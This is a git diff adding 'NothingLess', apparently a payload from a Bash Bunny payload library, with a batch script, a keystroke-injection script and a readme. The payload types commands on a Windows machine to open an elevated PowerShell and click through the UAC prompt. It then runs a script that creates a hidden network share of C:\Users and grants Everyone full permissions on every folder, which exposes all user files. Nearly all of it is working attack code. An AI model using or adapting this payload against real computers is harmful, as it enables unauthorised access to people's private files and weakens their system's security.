diff --git a/payloads/library/NothingLess/nl.cmd b/payloads/library/NothingLess/nl.cmd new file mode 100644 index 00000000..8533276c --- /dev/null +++ b/payloads/library/NothingLess/nl.cmd @@ -0,0 +1,9 @@ +ECHO off +REM gather the system file structure +mkdir c:\Users\tempa +tree /a /f > c:\Users\tempa\tree.txt + +REM creates a hidden share syntax(net share = /grant:,) +net share nless$=C:\Users /grant:Everyone,full +REM creates security permissions for the shared folder syntax(icacls /grant : /T +icacls "C:\Users" /grant Everyone:(OI)(CI)F /T \ No newline at end of file diff --git a/payloads/library/NothingLess/payload.txt b/payloads/library/NothingLess/payload.txt new file mode 100644 index 00000000..097a6e50 --- /dev/null +++ b/payloads/library/NothingLess/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: Nothing Less +# Author: StinkyBliss +# Version: 1.0 +# Target: Windows +# +# +# Maps the file system and stores it in c:\users\tempa +# Shares a location to everyone and grants full security permissions to everyone +# +# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions +# To share a drive change the path in nl.cmd to c: remove the quotes + +LED R 200 + +# Source bunny_helpers.sh to get environment variable SWITCH_POSITION +source bunny_helpers.sh + +ATTACKMODE HID + +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell -Verb runAs +#Q STRING powershell +Q ENTER + +# Bypass UAC +Q DELAY 1000 +Q LEFT +Q ENTER + +LED R G 200 + +ATTACKMODE HID STORAGE + +# Start nl.cmd +Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')" +Q ENTER + +# Wait for nl.cmd and exit +Q DELAY 1000 +Q STRING exit +Q ENTER + +sync + +LED G \ No newline at end of file diff --git a/payloads/library/NothingLess/readme.md b/payloads/library/NothingLess/readme.md new file mode 100644 index 00000000..4b10c0a6 --- /dev/null +++ b/payloads/library/NothingLess/readme.md @@ -0,0 +1,23 @@ +# NothingLess for Bash Bunnys + +* Author: StinkyBliss +* Version: Version 1.0 +* Target: Windows + +## Description + +For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions +To share a drive change the path in nl.cmd to c: remove the quotes + +## Configuration + +None, only optionl changes + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Setting up | +| yellow (blinking) | Attack running | +| Green | Attack Complete | +| ------------------ | -------------------------------------------- |